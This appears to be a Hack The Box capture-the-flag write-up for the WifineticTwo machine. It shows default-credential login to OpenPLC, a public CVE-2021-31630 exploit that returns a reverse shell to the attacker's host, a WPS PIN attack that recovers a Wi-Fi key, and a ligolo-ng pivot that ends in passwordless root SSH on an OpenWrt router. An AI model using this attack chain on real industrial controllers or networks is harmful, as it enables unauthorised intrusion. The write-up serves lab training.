HTB - WifineticTwo

Machine Info

WifineticTwo is a medium-difficulty Linux machine that features OpenPLC running on port 8080, vulnerable to Remote Code Execution through the manual exploitation of [CVE-2021-31630]. After obtaining an initial foothold on the machine, a WPS attack is performed to acquire the Wi-Fi password for an Access Point (AP). This access allows the attacker to target the router running OpenWRT and gain a root shell via its web interface.

Enumeration

---

Scope

IP Address: 10.10.11.7

Nmap Scan

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ nmap -p- --min-rate 10000 $ip -Pn 

PORT     STATE SERVICE    REASON
22/tcp   open  ssh        syn-ack
8080/tcp open  http-proxy syn-ack

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel2]
└─$ nmap -p -sCV $ip -oN Nmap/script-scan

PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
8080/tcp open  http-proxy Werkzeug/1.0.1 Python/2.7.18
|_http-server-header: Werkzeug/1.0.1 Python/2.7.18
| http-title: Site doesn't have a title (text/html; charset=utf-8).
|_Requested resource was http://10.10.11.7:8080/login
<SNIP>

* Open ports: 22 - 8080
* Services: SSH - HTTP
* Important notes: openPLC

┌──(kali㉿kali)-[~/…/HTB/machines/WifineticTwo/CVE-2021-31630-HTB]
└─$ sudo sh -c "echo  '$ip wifinetictwo.htb' >> /etc/hosts"

┌──(kali㉿kali)-[~/…/HTB/machines/WifineticTwo/CVE-2021-31630-HTB]
└─$ tail -n1 /etc/hosts
10.10.11.7 wifinetictwo.htb

http://10.10.11.7:8080/login

A quick search about OpenPLC CVEs

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/WifineticTwo]
└─$ searchsploit OpenPLC                        
----------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                             |  Path
----------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
OpenPLC 3 - Remote Code Execution (Authenticated)                                                                                                          | python/webapps/49803.py
OpenPLC WebServer 3 - Denial of Service                                                                                                                    | multiple/dos/51746.txt
----------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------

Initial Access

I don't have credential yet, So I tried default one: openplc:openplc and It worked

http://10.10.11.7:8080/dashboard

The exploit we have need credential, now I can run it.

GitHub - thewhiteh4t/cve-2021-31630: Python script for exploiting command injection in Open PLC Webserver v3GitHub

┌──(kali㉿kali)-[~/…/HTB/machines/WifineticTwo]
└─$ git clone https://github.com/thewhiteh4t/cve-2021-31630.git
<snip>

┌──(kali㉿kali)-[~/…/HTB/machines/WifineticTwo/cve-2021-31630]
└─$ python3 cve_2021_31630.py -u openplc -p openplc -lh 10.10.16.7 -lp 443 http://10.10.11.7:8080

------------------------------------------------
--- CVE-2021-31630 -----------------------------
--- OpenPLC WebServer v3 - Authenticated RCE ---
------------------------------------------------
[>] Found By : Fellipe Oliveira
[>] PoC By   : thewhiteh4t [ https://twitter.com/thewhiteh4t ]
[>] Target   : http://10.10.11.7:8080
[>] Username : openplc
[>] Password : openplc
[>] Timeout  : 200 secs
[>] LHOST    : 10.10.16.7
[>] LPORT    : 443

[!] Checking status...
[+] Service is Online!
[!] Logging in...
[+] Logged in!
[!] Restoring default program...
[+] PLC Stopped!
[+] Cleanup successful!
[!] Uploading payload...
[+] Payload uploaded!
[+] Waiting for 5 seconds...
[+] Compilation successful!
[!] Starting PLC...
[+] PLC Started! Check listener...
[!] Cleaning up...
[+] PLC Stopped!
[+] Cleanup successful! 

Receive Connection

┌──(kali㉿kali)-[~/study/Courses/HackThebox/HTB/machines/WifineticTwo]
└─$ nc -lvnp 443                                                                                                                                                                             
listening on [any] 443 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.11.7] 47504
id
uid=0(root) gid=0(root) groups=0(root)  

Upgrade the shell

script /dev/null -c bash
Ctrl+z
stty -echo raw; fg
reset
Terminal type? screen
stty rows 37 columns 189
export TERM=xterm-256color

I found my myself running command as root, maybe I'm in docker container or kind of virtualization.

The user flag is in /root directory

root@attica01:/# ls /root
user.txt
root@attica01:~# cat user.txt 
850e68329cf676exxxxxxxxxxxxxxxx

User Flag: 850e68329cf676exxxxxxxxxxxxxxxx

---

Privilege Escalation

The IP Address of the machine is not here, that makes me sure I'm not on the actual host. There is wlan0 interface also.

root@attica01:/# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.0.3.2  netmask 255.255.255.0  broadcast 10.0.3.255
        inet6 fe80::216:3eff:fefc:910c  prefixlen 64  scopeid 0x20<link>
        ether 00:16:3e:fc:91:0c  txqueuelen 1000  (Ethernet)
        RX packets 5716  bytes 529625 (529.6 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 4286  bytes 1207374 (1.2 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 715  bytes 39478 (39.4 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 715  bytes 39478 (39.4 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

wlan0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        ether 02:00:00:00:02:00  txqueuelen 1000  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

I uploaded linpeas.sh to the hox to enumerate and collect useful info from the host but didn't find anything interesting

linpeas.sh tells me that it's a virtual machine (lxc)

═╣ Is this a virtual machine? ..... Yes (lxc) 

Enumerating installed program shows that there are wireless tools here

root@attica01:~$ apt list --installed | cut -d"/" -f1,3

<snip>
whiptail
wireless-regdb
wireless-tools
wpasupplicant
<snip>

Following up this post, I was able to deal with wireless technology in that host:

Connect Wi-Fi Network From Terminal – Kali Linux - Yeah HubYeah Hub - Kali Linux Tutorials | Tech News | SEO Tips and Tricks

root@attica01:~$ iw wlan0 scan
BSS 02:00:00:00:01:00(on wlan0)
        last seen: 4928.704s [boottime]
        TSF: 1721706237223201 usec (19927d, 03:43:57)
        freq: 2412
        beacon interval: 100 TUs
        capability: ESS Privacy ShortSlotTime (0x0411)
        signal: -30.00 dBm
        last seen: 0 ms ago
        Information elements from Probe Response frame:
        SSID: plcrouter
        Supported rates: 1.0* 2.0* 5.5* 11.0* 6.0 9.0 12.0 18.0 
        DS Parameter set: channel 1
        ERP: Barker_Preamble_Mode
        Extended supported rates: 24.0 36.0 48.0 54.0 
        RSN:     * Version: 1
                 * Group cipher: CCMP
                 * Pairwise ciphers: CCMP
                 * Authentication suites: PSK
                 * Capabilities: 1-PTKSA-RC 1-GTKSA-RC (0x0000)
        Supported operating classes:
                 * current operating class: 81
        Extended capabilities:
                 * Extended Channel Switching
                 * SSID List
                 * Operating Mode Notification
        WPS:     * Version: 1.0
                 * Wi-Fi Protected Setup State: 2 (Configured)
                 * Response Type: 3 (AP)
                 * UUID: 572cf82f-c957-5653-9b16-b5cfb298abf1
                 * Manufacturer:  
                 * Model:  
                 * Model Number:  
                 * Serial Number:  
                 * Primary Device Type: 0-00000000-0
                 * Device name:  
                 * Config methods: Label, Display, Keypad
                 * Version2: 2.0

I got a hint from community about oneshot tool that attacks wireless by brute force attack.

root@attica01:~$ python3 oneshot.py -i wlan0
[*] Running wpa_supplicant…
[*] BSSID not specified (--bssid) — scanning for available networks
Networks list:
#    BSSID              ESSID                     Sec.     PWR  WSC device name             WSC model
1)   02:00:00:00:01:00  plcrouter                 WPA2     -30                                 
Select target (press Enter to refresh): 1   
[*] Running wpa_supplicant…
[*] Trying PIN '12345670'…
[*] Scanning…
[*] Authenticating…
[+] Authenticated
[*] Associating with AP…
[+] Associated with 02:00:00:00:01:00 (ESSID: plcrouter)
[*] Received Identity Request
[*] Sending Identity Response…
[*] Received WPS Message M1
[*] Sending WPS Message M2…
[*] Received WPS Message M3
[*] Sending WPS Message M4…
[*] Received WPS Message M5
[+] The first half of the PIN is valid
[*] Sending WPS Message M6…
[*] Received WPS Message M7
[+] WPS PIN: '12345670'
[+] WPA PSK: 'NoWWEDoKnowWhaxxxxxxxxxxx'
[+] AP SSID: 'plcrouter'

Connect to plcrouter network

root@attica01:~$ wpa_passphrase plcrouter >> /etc/wpa_supplicant/wpa_supplicant.conf                                                
# reading passphrase from stdin
NoWWEDoKnowWhaxxxxxxxxxxx

root@attica01:~$ wpa_supplicant -B -D wext -i wlan0 -c /etc/wpa_supplicant/wpa_supplicant.conf

Successfully initialized wpa_supplicant
rfkill: Cannot open RFKILL control device
ioctl[SIOCSIWENCODEEXT]: Invalid argument
ioctl[SIOCSIWENCODEEXT]: Invalid argument

Verify successful connection

root@attica01:~# iw wlan0 link
Connected to 02:00:00:00:01:00 (on wlan0)
        SSID: plcrouter
        freq: 2412
        RX: 16029 bytes (229 packets)
        TX: 1116 bytes (11 packets)
        signal: -30 dBm
        rx bitrate: 1.0 MBit/s
        tx bitrate: 12.0 MBit/s

        bss flags:      short-slot-time
        dtim period:    2
        beacon int:     100

But I didn't get an IP Address

root@attica01:~# ip addr show wlan0
5: wlan0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 02:00:00:00:02:00 brd ff:ff:ff:ff:ff:ff
    inet6 fe80::ff:fe00:200/64 scope link 
       valid_lft forever preferred_lft forever

Adding one.

I wasn't sure which CIDR IP to assign to the interface, so I decided to give it a try.

root@attica01:~$ ifconfig wlan0 192.168.1.5 netmask 255.255.255.0
root@attica01:~$ ifconfig wlan0
wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.1.5  netmask 255.255.255.0  broadcast 192.168.1.255
        inet6 fe80::ff:fe00:200  prefixlen 64  scopeid 0x20<link>
        ether 02:00:00:00:02:00  txqueuelen 1000  (Ethernet)

I set up a tunnel to enumerate the new network from my kali machine.

┌──(kali㉿kali)-[~/…/Tools/Pivot/ligolo-ng]
└─$ ./proxy-server -selfcert
WARN[0000] Using automatically generated self-signed certificates (Not recommended) 
INFO[0000] Listening on 0.0.0.0:11601                   
    __    _             __                       
   / /   (_)___ _____  / /___        ____  ____ _
  / /   / / __ `/ __ \/ / __ \______/ __ \/ __ `/
 / /___/ / /_/ / /_/ / / /_/ /_____/ / / / /_/ / 
/_____/_/\__, /\____/_/\____/     /_/ /_/\__, /  
        /____/                          /____/   

Made in France ♥ by @Nicocha30!

ligolo-ng »

root@attica01:~$ curl 10.10.16.7/agent.sh -o agent.sh
root@attica01:~$ chmod +x agent.sh
root@attica01:~$ ./agent.sh -connect 10.10.16.7:11601 -ignore-cert

ligolo-ng » session
1
ligolo-ng » start

Add the network route to ligolo interface and Ping sweep the network with fping

┌──(kali㉿kali)-[~/…/HTB/machines/WifineticTwo]
└─$ sudo ip route add 192.168.1.0/24 dev ligolo

┌──(kali㉿kali)-[~/…/HTB/machines/WifineticTwo]
└─$ fping -asgq 192.168.1.0/24

192.168.1.1
192.168.1.5

192.168.1.5 is the IP I assigned to wlan0 interface, So I will attack 192.168.1.1

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/WifineticTwo]
└─$ nmap 192.168.1.1 -F -Pn
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-23 00:19 EDT
Nmap scan report for 192.168.1.1
Host is up (0.10s latency).
Not shown: 92 closed tcp ports (conn-refused)
PORT      STATE    SERVICE
7/tcp     filtered echo
22/tcp    open     ssh
53/tcp    open     domain
80/tcp    open     http
443/tcp   open     https
514/tcp   filtered shell
2001/tcp  filtered dc
49154/tcp filtered unknown

I found ssh is there, so I tried to connect to it as root

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/WifineticTwo]
└─$ ssh root@192.168.1.1                       
The authenticity of host '192.168.1.1 (192.168.1.1)' can't be established.
ED25519 key fingerprint is SHA256:ZcoOrJ2dytSfHYNwN2vcg6OsZjATPopYMLPVYhczadM.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.1.1' (ED25519) to the list of known hosts.

BusyBox v1.36.1 (2023-11-14 13:38:11 UTC) built-in shell (ash)

  _______                     ________        __
 |       |.-----.-----.-----.|  |  |  |.----.|  |_
 |   -   ||  _  |  -__|     ||  |  |  ||   _||   _|
 |_______||   __|_____|__|__||________||__|  |____|
          |__| W I R E L E S S   F R E E D O M
 -----------------------------------------------------
 OpenWrt 23.05.2, r23630-842932a63d
 -----------------------------------------------------
=== WARNING! =====================================
There is no root password defined on this device!
Use the "passwd" command to set up a new password
in order to prevent unauthorized SSH logins.
--------------------------------------------------
root@ap:~# 

root@ap:~$ cat root.txt 
bd361577bf4d8653xxxxxxxxxxxxxxxx

Root Flag: bd361577bf4d8653xxxxxxxxxxxxxxxx